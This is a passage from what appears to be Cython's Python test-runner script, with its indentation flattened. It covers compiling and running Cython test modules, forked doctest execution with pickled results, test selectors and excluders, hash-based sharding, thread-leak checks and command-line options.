extension.language = 'c++'
if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.doctest_selector is not None:
tests._tests[:] = [test for test in tests._tests if self.doctest_selector(test.id())]
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
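# e.g. a child calling os._exit(1) produces result_code == 0x0100 (low byte 0),
# while a child killed by SIGSEGV reports signal 11 in the low byte (possibly
# with the core-dump flag set), which is what the check below detects.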
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
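# Taken together, the forked-test protocol above works roughly like this: the
# child collects outcomes in a PartialTestResult, data() strips members that
# cannot be pickled (live doctest objects are replaced by _FakeClass stand-ins),
# the resulting tuple is pickled into a temp file, and the parent merges it back
# into its own result via PartialTestResult.join_results().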
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExcluder implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
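# find_dep_version example: a module without __version__ that lives in the
# stdlib directory is reported with the Python version itself, while 'pkg.sub'
# without its own version falls back to the version of its parent package 'pkg'.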
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
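# The list files read by FileListExcluder (e.g. tests/bugs.txt) contain one
# selector per line; blank lines and '#' comments are ignored, and only the
# first whitespace-separated token of each line is used, so trailing notes may
# follow the selector.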
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
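# e.g. string_selector('ticket:1234') yields a TagsSelector matching tests
# tagged with ticket number 1234, while string_selector('numpy_') yields a
# case-insensitive RegExSelector matching any test name containing 'numpy_'.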
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# deterministic partition of the tests, which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
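# ShardExcludeSelector example: with shard_count == 4, ShardExcludeSelector(1, 4)
# excludes every test whose crc32(seed + name) does not fall into bucket 1, so
# the four shards together run each test exactly once without any coordination.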
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
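# get_version example: on a git checkout whose HEAD differs from the release tag
# this returns something like "3.0a0 <head-sha> + uncommitted changes"
# (illustrative only); on a plain source tarball it is just the version string.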
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# the code style checks use recursive glob ('**' wildcard), which requires Python 3.5+.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
